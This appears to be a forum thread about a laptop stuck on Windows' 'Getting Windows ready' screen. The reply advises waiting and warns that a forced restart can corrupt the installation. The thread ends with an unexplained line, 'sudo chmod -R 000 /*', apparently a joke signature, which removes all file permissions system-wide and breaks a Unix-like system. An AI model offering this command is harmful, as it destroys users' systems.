Laptop Stuck on "Getting Windows Ready. Don't Turn Off Your Computer"

My laptop has been stuck on "Getting Windows ready. Don't turn off your computer" For the past 40 minutes or so.
I have an SSD so I doubt that it's actually doing something. Also, it appears to be sleeping after every 5 minutes or so, so I don't think it's really updating or doing anything?
I got this error after I restarted my computer with a mouse and an earbud plugged in. Also had some programs open.

I remember the day before that I deleted some files for storage and I got windows to remove/compress some old windows versions to save space.
What should I do?

Wait. Microsoft decided to make the update process a black box, so you there's nothing you can do to stop it or figure out if something went wrong unless it tells you.

If it goes on for hours you can try forcing a restart but be aware that may very well corrupt your installation.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
